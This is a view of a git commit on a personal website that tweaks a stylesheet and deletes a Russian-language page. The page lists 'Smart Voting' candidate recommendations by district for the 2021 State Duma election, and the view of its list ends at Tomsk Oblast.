~lord/krasovs.ky

bed037ecb908b3894ef6fed246013de45b32cad9 — Savely Krasovsky 5 days ago 4e153a2
Small home page fix
3 files changed, 4 insertions(+), 849 deletions(-)

M assets/home.scss
D content/votesmart.md
D static/cmd.vm
M assets/home.scss => assets/home.scss +4 -0
@@ 110,6 110,10 @@
      align-items: baseline;
      justify-content: space-between;

      small {
        min-width: 8em;
      }

      @media(max-width: 640px) {
        flex-direction: column;


D content/votesmart.md => content/votesmart.md +0 -840
@@ 1,840 0,0 @@
# Кандидаты Умного голосования в Госдуму 2021


В этом README вы найдете кандидатов от Умного голосования на выборах в Госдуму и ссылку на актуальную версию андроид-приложения. Чтобы не стать жертвой кремлевских мошенников, **скачивайте ее ТОЛЬКО с GitHub по этой [ссылке](https://github.com/smartvotedocs/votesmart2021/releases/download/android-app/androidApp-release-69_2-2.apk)**

- Если вы голосуете за границей или хотите получить рекомендации по местным выборам, напишите нашему [телеграм-боту](https://t.me/smartvotebot). Он подскажет, где и за кого проголосовать. Или заходите на [сайт](https://votesmart.appspot.com/ "в России доступен из-под VPN").

- [Cкачайте](/leaflets/general) наши листовки, распечатайте их и повесьте в своём подъезде.


>**В бюллетене со списком партий выбирайте любую парламентскую партию, кроме «Единой России». Помните: голос, отданный за партию, которая наберет меньше 5%, достанется единороссам.**

>**На губернаторских выборах голосуйте за любого, кроме кандидата от власти. Здесь главное — добиться второго тура, а для этого надо, чтобы никто не набрал больше 50%.**
___

**Чтобы посмотреть рекомендацию, прокрутите ниже, нажмите на название своего региона, а потом выберите нужный округ. Узнать свой округ можно [здесь](https://docs.cntd.ru/document/420313105).**


* [г. Москва](#Москва)
* [г. Санкт-Петербург](#Санкт-Петербург)
* [г. Севастополь](#Севастополь)
* [Алтайский край](#Алтайский)
* [Амурская область](#Амурская)
* [Архангельская область](#Архангельская)
* [Астраханская область](#Астраханская)
* [Белгородская область](#Белгородская)
* [Брянская область](#Брянская)
* [Владимирская область](#Владимирская)
* [Волгоградская область](#Волгоградская)
* [Вологодская область](#Вологодская)
* [Воронежская область](#Воронежская)
* [Еврейская автономная область](#ЕАО)
* [Забайкальский край](#Забайкальский)
* [Ивановская область](#Ивановская)
* [Иркутская область](#Иркутская)
* [Кабардино-Балкарская Республика](#Кабардино-Балкарская)
* [Калининградская область](#Калининградская)
* [Калужская область](#Калужская)
* [Камчатский край](#Камчатский)
* [Карачаево-Черкесская Республика](#Карачаево-Черкесская)
* [Кемеровская область](#Кемеровская)
* [Кировская область](#Кировская)
* [Костромская область](#Костромская)
* [Краснодарский край](#Краснодарский)
* [Красноярский край](#Красноярский)
* [Курганская область](#Курганская)
* [Курская область](#Курская)
* [Ленинградская область](#Ленинградская)
* [Липецкая область](#Липецкая)
* [Магаданская область](#Магаданская)
* [Московская область](#Московская)
* [Мурманская область](#Мурманская)
* [Ненецкий автономный округ](#Ненецкий)
* [Нижегородская область](#Нижегородская)
* [Новгородская область](#Новгородская)
* [Новосибирская область](#Новосибирская)
* [Омская область](#Омская)
* [Оренбургская область](#Оренбургская)
* [Орловская область](#Орловская)
* [Пензенская область](#Пензенская)
* [Пермский край](#Пермский)
* [Приморский край](#Приморский)
* [Псковская область](#Псковская)
* [Республика Адыгея](#Адыгея)
* [Республика Алтай](#Алтай)
* [Республика Башкортостан](#Башкортостан)
* [Республика Бурятия](#Бурятия)
* [Республика Дагестан](#Дагестан)
* [Республика Ингушетия](#Ингушетия)
* [Республика Калмыкия](#Калмыкия)
* [Республика Карелия](#Карелия)
* [Республика Коми](#Коми)
* [Республика Крым](#Крым)
* [Республика Марий Эл](#Марий_Эл)
* [Республика Мордовия](#Мордовия)
* [Республика Саха (Якутия)](#Якутия)
* [Республика Северная Осетия – Алания](#Северная-Осетия)
* [Республика Татарстан](#Татарстан)
* [Республика Тыва](#Тыва)
* [Республика Хакасия](#Хакасия)
* [Ростовская область](#Ростовская)
* [Рязанская область](#Рязанская)
* [Самарская область](#Самарская)
* [Саратовская область](#Саратовская)
* [Сахалинская область](#Сахалинская)
* [Свердловская область](#Свердловская)
* [Смоленская область](#Смоленская)
* [Ставропольский край](#Ставропольский)
* [Тамбовская область](#Тамбовская)
* [Тверская область](#Тверская)
* [Томская область](#Томская)
* [Тульская область](#Тульская)
* [Тюменская область](#Тюменская)
* [Удмуртская Республика](#Удмуртская)
* [Ульяновская область](#Ульяновская)
* [Хабаровский край](#Хабаровский)
* [Ханты-Мансийский автономный округ](#Ханты-Мансийский)
* [Челябинская область](#Челябинская)
* [Чеченская Республика](#Чеченская)
* [Чувашская Республика](#Чувашская)
* [Чукотский автономный округ](#Чукотский)
* [Ямало-Ненецкий автономный округ](#Ямало-Ненецкий)
* [Ярославская область](#Ярославская)

# <a id="Москва"></a> г. Москва

[Листовки по всем округам](/leaflets/moscow/)

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 196 Город Москва – Бабушкинский | Рашкин Валерий Федорович | КПРФ |
| 197 Город Москва – Кунцевский | Лобанов Михаил Сергеевич | КПРФ |
| 198 Город Москва – Ленинградский | Брюханова Анастасия Андреевна | самовыдвижение |
| 199 Город Москва – Люблинский | Гуличева Елена Геннадьевна | КПРФ |
| 200 Город Москва – Медведковский | Парфенов Денис Андреевич | КПРФ |
| 201 Город Москва – Нагатинский | Удальцова Анастасия Олеговна | КПРФ |
| 202 Город Москва – Новомосковский | Махницкий Данил Павлович | Новые люди |
| 203 Город Москва – Орехово-Борисовский | Петров Виталий Владимирович | КПРФ |
| 204 Город Москва – Перовский | Курганский Сергей Борисович | КПРФ |
| 205 Город Москва – Преображенский | Обухов Сергей Павлович | КПРФ |
| 206 Город Москва – Тушинский | Гребенник Андрей Вадимович | КПРФ |
| 207 Город Москва – Ховринский | Ульянченко Иван Викторович | КПРФ |
| 208 Город Москва – Центральный | Митрохин Сергей Сергеевич | Яблоко |
| 209 Город Москва – Черемушкинский | Николаев Игорь Алексеевич | Яблоко |
| 210 Город Москва – Чертановский | Таранцов Михаил Александрович | КПРФ |


# <a id="Санкт-Петербург"></a> г. Санкт-Петербург

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 211 Город Санкт-Петербург – Восточный | Ходунова Ольга Архиповна | КПРФ |
| 212 Город Санкт-Петербург – Западный | Тихонова Надежда Геннадьевна | Справедливая Россия — Патриоты — За правду |
| 213 Город Санкт-Петербург – Северный | Иванова Ирина Владимировна | КПРФ |
| 214 Город Санкт-Петербург – Северо-Восточный | Драпеко Елена Григорьевна | Справедливая Россия — Патриоты — За правду |
| 215 Город Санкт-Петербург – Северо-Западный | Нилов Олег Анатольевич | Справедливая Россия — Патриоты — За правду |
| 216 Город Санкт-Петербург – Центральный | Вишневский Борис Лазаревич | Яблоко |
| 217 Город Санкт-Петербург – Юго-Восточный | Дмитриева Оксана Генриховна | Партия Роста |
| 218 Город Санкт-Петербург – Южный | Орешков Борис Иванович | Яблоко |


# <a id="Севастополь"></a> г. Севастополь

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 219 Город Севастополь – Севастопольский | Журавлев Илья Григорьевич | ЛДПР |


# <a id="Алтайский"></a> Алтайский край

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 39 Алтайский край – Барнаульский | Кривов Андрей Юрьевич | КПРФ |
| 40 Алтайский край – Рубцовский | Прусакова Мария Николаевна | КПРФ |
| 41 Алтайский край – Бийский | Арцибашев Антон Игоревич | КПРФ |
| 42 Алтайский край – Славгородский | Левашова Анна Валерьевна | КПРФ |


# <a id="Амурская"></a> Амурская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 71 Амурская область – Амурский | Кузьмин Андрей Альбертович | ЛДПР |


# <a id="Архангельская"></a> Архангельская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 72 Архангельская область – Архангельский | Мандрыкин Олег Анатольевич | Яблоко |
| 73 Архангельская область – Котласский | Чиркова Ирина Александровна | Справедливая Россия — Патриоты — За правду |


# <a id="Астраханская"></a> Астраханская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 74 Астраханская область – Астраханский | Шеин Олег Васильевич | Справедливая Россия — Патриоты — За правду |


# <a id="Белгородская"></a>Белгородская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 75 Белгородская область – Белгородский | Панов Станислав Геннадьевич | КПРФ |
| 76 Белгородская область – Старооскольский | Мишустин Николай Николаевич | КПРФ |


# <a id="Брянская"></a>Брянская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 77 Брянская область – Брянский | Павлов Константин Леонидович | КПРФ |
| 78 Брянская область – Унечский | Минаков Виталий Викторович | Справедливая Россия — Патриоты — За правду |


# <a id="Владимирская"></a>Владимирская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 79 Владимирская область – Владимирский | Емельянова Лариса Николаевна | КПРФ |
| 80 Владимирская область – Суздальский | Сидорко Антон Сергеевич | КПРФ |


# <a id="Волгоградская"></a>Волгоградская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 81 Волгоградская область – Волгоградский | Светличная Елена Геннадьевна | КПРФ |
| 82 Волгоградская область – Красноармейский | Калашников Дмитрий Владимирович | Справедливая Россия — Патриоты — За правду |
| 83 Волгоградская область – Михайловский | Могильный Валерий Федорович | КПРФ |
| 84 Волгоградская область – Волжский | Усков Денис Вячеславович | КПРФ |


# <a id="Вологодская"></a>Вологодская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 85 Вологодская область – Вологодский | Ершов Олег Александрович | КПРФ |
| 86 Вологодская область – Череповецкий | Морозов Александр Николаевич | КПРФ |


# <a id="Воронежская"></a>Воронежская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 87 Воронежская область – Воронежский | Калинин Владимир Александрович | КПРФ |
| 88 Воронежская область – Правобережный | Коломенцев Денис Витальевич | КПРФ |
| 89 Воронежская область – Аннинский | Рымарь Артем Сергеевич | Справедливая Россия — Патриоты — За правду |
| 90 Воронежская область – Павловский | Рослик Денис Викторович | КПРФ |


# <a id="ЕАО"></a>Еврейская автономная область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 220 Еврейская автономная область – Еврейский | Лазарев Константин Александрович | КПРФ |


# <a id="Забайкальский"></a>Забайкальский край

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 43 Забайкальский край – Читинский | Волков Юрий Геннадьевич | Справедливая Россия — Патриоты — За правду |
| 44 Забайкальский край – Даурский | Кулиева Василина Васильевна | ЛДПР |


# <a id="Ивановская"></a>Ивановская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 91 Ивановская область – Ивановский | Протасевич Светлана Александровна | КПРФ |
| 92 Ивановская область – Кинешемский | Римский Сергей Евгеньевич | Яблоко |


# <a id="Иркутская"></a>Иркутская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 93 Иркутская область – Иркутский | Щапов Михаил Викторович | КПРФ |
| 94 Иркутская область – Ангарский | Ахмадулин Андрей Фанисович | КПРФ |
| 95 Иркутская область – Шелеховский | Кондрашов Виктор Иванович | КПРФ |
| 96 Иркутская область – Братский | Андреев Андрей Анатольевич | КПРФ |


# <a id="Кабардино-Балкарская"></a>Кабардино-Балкарская Республика

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 14 Кабардино-Балкарская Республика – Кабардино-Балкарский | Паштов Борис Султанович | КПРФ |


# <a id="Калининградская"></a>Калининградская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 97 Калининградская область – Калининградский | Курбатов Семён Юрьевич | ЛДПР |
| 98 Калининградская область – Центральный | Мишин Евгений Викторович | ЛДПР |


# <a id="Калужская"></a>Калужская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 99 Калужская область – Калужский | Яшкин Николай Иванович | КПРФ |
| 100 Калужская область – Обнинский | Ефремова Надежда Игоревна | Справедливая Россия — Патриоты — За правду |


# <a id="Камчатский"></a>Камчатский край

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 45 Камчатский край – Камчатский | Калашников Валерий Юрьевич | ЛДПР |


# <a id="Карачаево-Черкесская"></a>Карачаево-Черкесская Республика

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 16 Карачаево-Черкесская Республика – Карачаево-Черкесский | Бытдаев Кемал Курманович | КПРФ |


# <a id="Кемеровская"></a>Кемеровская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 101 Кемеровская область – Кемеровский | Фролова Кристина Олеговна | Новые люди |
| 102 Кемеровская область – Прокопьевский | Пронин Владимир Григорьевич | Справедливая Россия — Патриоты — За правду |
| 103 Кемеровская область – Заводский | Терзицкая Олеся Викторовна | КПРФ |
| 104 Кемеровская область – Новокузнецкий | Протас Татьяна Владимировна | Справедливая Россия — Патриоты — За правду |


# <a id="Кировская"></a>Кировская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 105 Кировская область – Кировский | Бикалюк Альберт Александрович | Справедливая Россия — Патриоты — За правду |
| 106 Кировская область – Кирово-Чепецкий | Сураева Надежда Васильевна | Справедливая Россия — Патриоты — За правду |


# <a id="Костромская"></a>Костромская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 107 Костромская область – Костромской | Ижицкий Валерий Петрович | КПРФ |


# <a id="Краснодарский"></a>Краснодарский край

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 46 Краснодарский край – Краснодарский | Жилищиков Иван Андреевич | КПРФ |
| 47 Краснодарский край – Красноармейский | Сафронов Александр Михайлович | КПРФ |
| 48 Краснодарский край – Славянский | Коломиец Дмитрий Викторович | КПРФ |
| 49 Краснодарский край – Туапсинский | Пронькин Виталий Владимирович | КПРФ |
| 50 Краснодарский край – Сочинский | Боровков Николай Васильевич | КПРФ |
| 51 Краснодарский край – Тихорецкий | Белобрицкий Артем Алексеевич | КПРФ |
| 52 Краснодарский край – Армавирский | Давтян Грачик Акопович | КПРФ |
| 53 Краснодарский край – Каневской | Коровайный Александр Евгеньевич | Яблоко |


# <a id="Красноярский"></a>Красноярский край

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 54 Красноярский край – Красноярский | Натаров Сергей Васильевич | ЛДПР |
| 55 Красноярский край – Центральный | Терехов Денис Эдуардович | Новые люди |
| 56 Красноярский край – Дивногорский | Мельниченко Борис Владимирович | КПРФ |
| 57 Красноярский край – Енисейский | Иванова Ирина Геннадьевна | Зелёные |


# <a id="Курганская"></a>Курганская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 108 Курганская область – Курганский | Зырянов Виктор Леонидович | КПРФ |


# <a id="Курская"></a>Курская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 109 Курская область – Курский | Бондаренко Татьяна Валерьевна | Новые люди |
| 110 Курская область – Сеймский | Бобовников Алексей Николаевич | КПРФ |


# <a id="Ленинградская"></a>Ленинградская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 111 Ленинградская область – Всеволожский | Будеев Вадим Александрович | КПРФ |
| 112 Ленинградская область – Кингисеппский | Кузьмин Николай Алексеевич | КПРФ |
| 113 Ленинградская область – Волховский | Перминов Александр Александрович | Справедливая Россия — Патриоты — За правду |


# <a id="Липецкая"></a>Липецкая область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 114 Липецкая область – Липецкий | Быковских Николай Иванович | КПРФ |
| 115 Липецкая область – Левобережный | Токарев Сергей Владимирович | КПРФ |


# <a id="Магаданская"></a>Магаданская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 116 Магаданская область – Магаданский | Попов Алексей Леонидович | КПРФ |


# <a id="Московская"></a>Московская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 117 Московская область – Балашихинский | Шинкарев Дмитрий Николаевич | Справедливая Россия — Патриоты — За правду |
| 118 Московская область – Дмитровский | Надеждин Борис Борисович | Справедливая Россия — Патриоты — За правду |
| 119 Московская область – Коломенский | Кононенко Дмитрий Халарович | КПРФ |
| 120 Московская область – Красногорский | Пьяных Глеб Валентинович | Справедливая Россия — Патриоты — За правду |
| 121 Московская область – Люберецкий | Емельянов Олег Владиславович | КПРФ |
| 122 Московская область – Одинцовский | Теняев Сергей Александрович | КПРФ |
| 123 Московская область – Орехово-Зуевский | Аграновский Дмитрий Владимирович | КПРФ |
| 124 Московская область – Подольский | Иванюженков Борис Викторович | КПРФ |
| 125 Московская область – Сергиево-Посадский | Мардасов Андрей Игоревич | Справедливая Россия — Патриоты — За правду |
| 126 Московская область – Серпуховский | Черепенников Андрей Владимирович | КПРФ |
| 127 Московская область – Щелковский | Мокринская Елена Федоровна | КПРФ |


# <a id="Мурманская"></a>Мурманская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 128 Мурманская область – Мурманский | Макаревич Александр Геннадьевич | Справедливая Россия — Патриоты — За правду |


# <a id="Ненецкий"></a>Ненецкий автономный округ

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 221 Ненецкий автономный округ – Ненецкий | Райн Михаил Викторович | КПРФ |


# <a id="Нижегородская"></a>Нижегородская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 129 Нижегородская область – Нижегородский | Гриневич Татьяна Борисовна | Справедливая Россия — Патриоты — За правду |
| 130 Нижегородская область – Приокский | Рыхтик Михаил Иванович | КПРФ |
| 131 Нижегородская область – Автозаводский | Кирица Олег Сергеевич | КПРФ |
| 132 Нижегородская область – Канавинский | Терентьев Александр Георгиевич | КПРФ |
| 133 Нижегородская область – Борский | Чугрин Дмитрий Борисович | ЛДПР |


# <a id="Новгородская"></a>Новгородская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 134 Новгородская область – Новгородский | Афанасьев Алексей Владимирович | Справедливая Россия — Патриоты — За правду |


# <a id="Новосибирская"></a>Новосибирская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 135 Новосибирская область – Новосибирский | Украинцев Игорь Сергеевич | Зелёные |
| 136 Новосибирская область – Центральный | Сулейманов Ренат Исмаилович | КПРФ |
| 137 Новосибирская область – Искитимский | Новоселов Виталий Валерьевич | КПРФ |
| 138 Новосибирская область – Барабинский | Яковлев Роман Борисович | КПРФ |


# <a id="Омская"></a>Омская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 139 Омская область – Омский | Алехин Андрей Анатольевич | КПРФ |
| 140 Омская область – Москаленский | Смолин Олег Николаевич | КПРФ |
| 141 Омская область – Любинский | Ткачев Константин Германович | КПРФ |


# <a id="Оренбургская"></a>Оренбургская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 142 Оренбургская область – Оренбургский | Мунжасаров Нурлан Нурмагамбетович | КПРФ |
| 143 Оренбургская область – Бугурусланский | Набатчикова Оксана Валерьевна | Справедливая Россия — Патриоты — За правду |
| 144 Оренбургская область – Орский | Каширский Алексей Сергеевич | Справедливая Россия — Патриоты — За правду |


# <a id="Орловская"></a>Орловская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 145 Орловская область – Орловский | Иконников Василий Николаевич | КПРФ |


# <a id="Пензенская"></a>Пензенская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 146 Пензенская область – Пензенский | Иванов Алексей Анатольевич | КПРФ |
| 147 Пензенская область – Лермонтовский | Шпагин Алексей Николаевич | Справедливая Россия — Патриоты — За правду |


# <a id="Пермский"></a>Пермский край

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 58 Пермский край – Пермский | Горбунова Олеся Олеговна | КПРФ |
| 59 Пермский край – Чусовской | Постников Олег Сергеевич | ЛДПР |
| 60 Пермский край – Кунгурский | Куликова Вероника Дмитриевна | Справедливая Россия — Патриоты — За правду |
| 61 Пермский край – Кудымкарский | Айтакова Ксения Алексеевна | КПРФ |


# <a id="Приморский"></a>Приморский край

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 62 Приморский край – Владивостокский | Самсонов Артём Анатольевич | КПРФ |
| 63 Приморский край – Артемовский | Акимов Андрей Петрович | КПРФ |
| 64 Приморский край – Арсеньевский | Елишов Анатолий Васильевич | КПРФ |


# <a id="Псковская"></a>Псковская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 148 Псковская область – Псковский | Гайдук Артур Маркович | Яблоко |


# <a id="Адыгея"></a>Республика Адыгея

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 1 Республика Адыгея (Адыгея) – Адыгейский | Салов Евгений Иванович | КПРФ |


# <a id="Алтай"></a>Республика Алтай

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 2 Республика Алтай – Алтайский | Демина Мария Фоминична | КПРФ |


# <a id="Башкортостан"></a>Республика Башкортостан

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 3 Республика Башкортостан – Уфимский | Ющенко Александр Андреевич | КПРФ |
| 4 Республика Башкортостан – Благовещенский | Романчиков Евгений Иванович | КПРФ |
| 5 Республика Башкортостан – Белорецкий | Сухарев Иван Константинович | ЛДПР |
| 6 Республика Башкортостан – Нефтекамский | Галин Ильгам Илюсович | КПРФ |
| 7 Республика Башкортостан – Салаватский | Суюндуков Ильгиз Варисович | КПРФ |
| 8 Республика Башкортостан – Стерлитамакский | Искандаров Вадим Венирович | Справедливая Россия — Патриоты — За правду |


# <a id="Бурятия"></a>Республика Бурятия

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 9 Республика Бурятия – Бурятский | Цыренов Баир Цыденович | КПРФ |


# <a id="Дагестан"></a>Республика Дагестан

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 10 Республика Дагестан – Северный | Авезов Мурзадин Алибекович | КПРФ |
| 11 Республика Дагестан – Центральный | Махмудов Махмуд Гаджулаевич | КПРФ |
| 12 Республика Дагестан – Южный | Омаров Гаджимурад Заирбекович | Справедливая Россия — Патриоты — За правду |


# <a id="Ингушетия"></a>Республика Ингушетия

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 13 Республика Ингушетия – Ингушский | Мартазанов Абдулмажит Кадирович | Справедливая Россия — Патриоты — За правду |


# <a id="Калмыкия"></a>Республика Калмыкия

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 15 Республика Калмыкия – Калмыцкий | Убушиев Санал Валерьевич | КПРФ |


# <a id="Карелия"></a>Республика Карелия

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 17 Республика Карелия – Карельский | Слабунова Эмилия Эдгардовна | Яблоко |


# <a id="Коми"></a>Республика Коми

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 18 Республика Коми – Сыктывкарский | Михайлов Олег Алексеевич | КПРФ |


# <a id="Крым"></a>Республика Крым

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 19 Республика Крым – Симферопольский | Лобода Оксана Васильевна | Новые люди |
| 20 Республика Крым – Керченский | Волков Николай Анатольевич | ЛДПР |
| 21 Республика Крым – Евпаторийский | Билан Виктория Леонидовна | Справедливая Россия — Патриоты — За правду |


# <a id="Марий_Эл"></a>Республика Марий Эл

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 22 Республика Марий Эл – Марийский | Казанков Сергей Иванович | КПРФ |


# <a id="Мордовия"></a>Республика Мордовия

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 23 Республика Мордовия – Мордовский | Кузякин Дмитрий Викторович | КПРФ |


# <a id="Якутия"></a>Республика Саха (Якутия)

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 24 Республика Саха (Якутия) – Якутский | Тумусов Федот Семёнович | Справедливая Россия — Патриоты — За правду |


# <a id="Северная-Осетия"></a>Республика Северная Осетия – Алания

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 25 Республика Северная Осетия – Алания – Северо-Осетинский | Дидаров Сослан Владимирович | Справедливая Россия — Патриоты — За правду |


# <a id="Татарстан"></a>Республика Татарстан

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 26 Республика Татарстан (Татарстан) – Приволжский | Сафин Фадбир Магусович | КПРФ |
| 27 Республика Татарстан (Татарстан) – Московский | Федоров Станислав Владимирович | КПРФ |
| 28 Республика Татарстан (Татарстан) – Нижнекамский | Сираев Ильнар Рашитович | Справедливая Россия — Патриоты — За правду |
| 29 Республика Татарстан (Татарстан) – Набережно-Челнинский | Гурьева Татьяна Ивановна | Коммунисты России |
| 30 Республика Татарстан (Татарстан) – Альметьевский | Семенихин Алексей Вячеславович | КПРФ |
| 31 Республика Татарстан (Татарстан) – Центральный | Прокофьев Артём Вячеславович | КПРФ |


# <a id="Тыва"></a>Республика Тыва

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 32 Республика Тыва – Тывинский | Ооржак Ренат Чадамбаевич | Справедливая Россия — Патриоты — За правду |


# <a id="Хакасия"></a>Республика Хакасия

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 35 Республика Хакасия – Хакасский | Старостин Валерий Николаевич | КПРФ |


# <a id="Ростовская"></a>Ростовская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 149 Ростовская область – Ростовский | Черкашин Лавр Александрович | КПРФ |
| 150 Ростовская область – Нижнедонской | Емельянов Михаил Васильевич | Справедливая Россия — Патриоты — За правду |
| 151 Ростовская область – Таганрогский | Бессонов Евгений Иванович | КПРФ |
| 152 Ростовская область – Южный | Кутырев Андрей Андреевич | КПРФ |
| 153 Ростовская область – Белокалитвинский | Абакумов Виталий Анатольевич | КПРФ |
| 154 Ростовская область – Шахтинский | Мезинов Юрий Геннадьевич | Справедливая Россия — Патриоты — За правду |
| 155 Ростовская область – Волгодонской | Мисан Алексей Владимирович | КПРФ |


# <a id="Рязанская"></a>Рязанская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 156 Рязанская область – Рязанский | Струков Олег Николаевич | КПРФ |
| 157 Рязанская область – Скопинский | Шерин Александр Николаевич | ЛДПР |


# <a id="Самарская"></a>Самарская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 158 Самарская область – Самарский | Абдалкин Михаил Анатольевич | КПРФ |
| 159 Самарская область – Тольяттинский | Калашников Леонид Иванович | КПРФ |
| 160 Самарская область – Красноглинский | Говорков Геннадий Александрович | КПРФ |
| 161 Самарская область – Жигулевский | Воробьев Василий Алексеевич | КПРФ |
| 162 Самарская область – Промышленный | Матвеев Михаил Николаевич | КПРФ |


# <a id="Саратовская"></a>Саратовская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 163 Саратовская область – Саратовский | Анидалов Александр Юрьевич | КПРФ |
| 164 Саратовская область – Балаковский | Есипов Владимир Евгеньевич | КПРФ |
| 165 Саратовская область – Балашовский | Бондаренко Николай Николаевич | КПРФ |
| 166 Саратовская область – Энгельсский | Алимова Ольга Николаевна | КПРФ |


# <a id="Сахалинская"></a>Сахалинская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 167 Сахалинская область – Сахалинский | Корниенко Алексей Викторович | КПРФ |


# <a id="Свердловская"></a>Свердловская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 168 Свердловская область – Свердловский | Постников Владислав Владимирович | Яблоко |
| 169 Свердловская область – Каменск-Уральский | Гориславцев Андрей Владимирович | Справедливая Россия — Патриоты — За правду |
| 170 Свердловская область – Березовский | Парфенов Алексей Александрович | КПРФ |
| 171 Свердловская область – Нижнетагильский | Бояркин Михаил Валентинович | КПРФ |
| 172 Свердловская область – Асбестовский | Крылова Наталья Владимировна | КПРФ |
| 173 Свердловская область – Первоуральский | Исаков Тарас Мамаджанович | КПРФ |
| 174 Свердловская область – Серовский | Даутов Габбас Фанзовиевич | КПРФ |


# <a id="Смоленская"></a>Смоленская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 175 Смоленская область – Смоленский | Копыл Олег Владимирович | КПРФ |
| 176 Смоленская область – Рославльский | Леонов Сергей Дмитриевич | ЛДПР |


# <a id="Ставропольский"></a>Ставропольский край

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 65 Ставропольский край – Ставропольский | Гончаров Виктор Иванович | КПРФ |
| 66 Ставропольский край – Невинномысский | Куриленко Александр Иванович | ЛДПР |
| 67 Ставропольский край – Кавминводский | Сердюков Андрей Иванович | КПРФ |
| 68 Ставропольский край – Георгиевский | Лозовой Виктор Иванович | КПРФ |



# <a id="Тамбовская"></a>Тамбовская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 177 Тамбовская область – Тамбовский | Жидков Андрей Игоревич | КПРФ |
| 178 Тамбовская область – Рассказовский | Александров Артём Романович | КПРФ |


# <a id="Тверская"></a>Тверская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 179 Тверская область – Тверской | Чепа Алексей Васильевич | Справедливая Россия — Патриоты — За правду |
| 180 Тверская область – Заволжский | Гончаров Артем Сергеевич | КПРФ |


# <a id="Томская"></a>Томская область

| Округ | ФИО кандидата | Партия |
| ----- | ------------- | ------ |
| 181 Томская область – Томский | Диденко Алексей Николаевич | ЛДПР |
